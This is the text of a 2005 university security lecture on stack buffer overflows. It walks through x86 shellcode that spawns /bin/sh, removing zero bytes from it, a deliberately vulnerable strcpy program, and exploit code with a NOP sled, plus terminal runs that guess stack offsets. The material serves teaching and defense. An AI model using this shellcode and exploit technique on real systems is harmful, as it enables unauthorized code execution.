Foundations of Network and Computer SecurityAnnouncementsRunning Code in the Data Segment: testsc.cAnother Problem: ZerosEliminating ZerosNew Shell Code (no zeros)Ok, We’re Done? Well…If we know where the buffer isOtherwise, how do we Guess?vulnerable.cexploit1.cLet’s Try It!Doesn’t Work Well: A New IdeaFinal Version of ExploitSmall BuffersDefensesStackGuardSample Stack with CanaryCanaries can be DefeatedAvoiding CanariesMoral: If Overruns Exist, High Probability of an ExploitNon-Executing Stacks and Return to LibCReturn to LibC: Getting around the Non-Executing Stack ProblemReturn to LibC: Stack ConfigurationAutomated Source Code AnalysisModeling the ProgramStatic AnalysisAn Analysis Tool for Detecting Possible Buffer OverflowsModeling StringsThe Translation TableProgram AnalysisEvaluating the Range AnalysisAn Implementation of the ToolEmperical ResultsAnd then there’s sendmailPerformanceFoundations of Network and Foundations of Network and Computer SecurityComputer SecurityJJohn BlackLecture #20Nov 10th 2005CSCI 6268/TLEN 5831, Fall 2005Announcements•I’m gone next Tuesday–Sorry•We will have class!–Martin will present a security analysis we did on the ICC–This is a preview of a conference presentation to appear at ACSAC in Tucson next month–You are responsible for the contents of this lectureRunning Code in the Data Segment: testsc.cchar shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode;}research $ gcc -o testsc testsc.c research $ ./testsc $ exit research $Another Problem: Zeros•Notice hex code has zero bytes–If we’re overrunning a command-line parameter, probably strcpy() is being used–It will stop copying at the first zero byte–We won’t get all our code transferred!–Can we write the shell code without zeros?Eliminating Zeros Problem instruction: Substitute with: -------------------------------------------------------- movb $0x0,0x7(%esi) xorl %eax,%eax movl $0x0,0xc(%esi) movb %eax,0x7(%esi) movl %eax,0xc(%esi) ------------------------------------------------------- movl $0xb,%eax movb $0xb,%al -------------------------------------------------------- movl $0x1, %eax xorl %ebx,%ebx movl $0x0, %ebx movl %ebx,%eax inc %eax --------------------------------------------------------New Shell Code (no zeros)char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode;}research $ gcc -o testsc testsc.c research $ ./testsc $ exit research $Ok, We’re Done? Well…•We have zero-less shell code•It is relocatable•It spawns a shell•We just have to get it onto the stack of some vulnerable program!–And then we have to modify the return address in that stack frame to jump to the beginning of our shell code… ahh…–If we know the buffer size and the address where the buffer sits, we’re done (this is the case when we have the code on the same OS sitting in front of us)–If we don’t know these two items, we have to guess…If we know where the buffer ischar shellcode[] = . . .char large_string[128];void main() { char buffer[96]; long *long_ptr = (long *) large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; large_string[127] = ‘\0’; strcpy(buffer,large_string);}// This works: ie, it spawns a shellOtherwise, how do we Guess?•The stack always starts at the same (high) memory address–Here is sp.c:unsigned long get_sp(void) { __asm__("movl %esp,%eax");}void main() { printf("0x%x\n", get_sp());}$ ./sp0x8000470$vulnerable.cvoid main(int argc, char *argv[]) { char buffer[512]; if (argc > 1) strcpy(buffer,argv[1]);}•Now we need to inject our shell code into this program–We’ll pretend we don’t know the code layout or the buffer size–Let’s attack this programexploit1.cvoid main(int argc, char *argv[]) { if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); buff = malloc(bsize); addr = get_sp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr += 4; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; memcpy(buff,"EGG=",4); putenv(buff); system("/bin/bash");}Let’s Try It!research $ ./exploit1 600 0Using address: 0xbffffdb4research $ ./vulnerable $EGGIllegal instructionresearch $ exitresearch $ ./exploit1 600 100Using address: 0xbffffd4cresearch $ ./vulnerable $EGGSegmentation faultresearch $ exitresearch $ ./exploit1 600 200Using address: 0xbffffce8research $ ./vulnerable $EGGSegmentation faultresearch $ exit...research $ ./exploit1 600 1564Using address: 0xbffff794research $ ./vulnerable $EGG$Doesn’t Work Well: A New Idea•We would have to guess exactly the buffer’s address–Where the shell code starts•A better technique exists–Pad front of shell code with NOP’s–We’ll fill half of our (guessed) buffer size with NOP’s and then insert the shell code–Fill the rest with return addresses–If we jump anywhere in the NOP section, our shell code will executeFinal Version of Exploitvoid main(int argc, char *argv[]) { int i; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); buff = malloc(bsize); addr = get_sp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; memcpy(buff,"EGG=",4); putenv(buff); system("/bin/bash");}Small Buffers•What if buffer is so small we can’t fit the shell code in it?–Other techniques possible–One way is to modify the program’s environment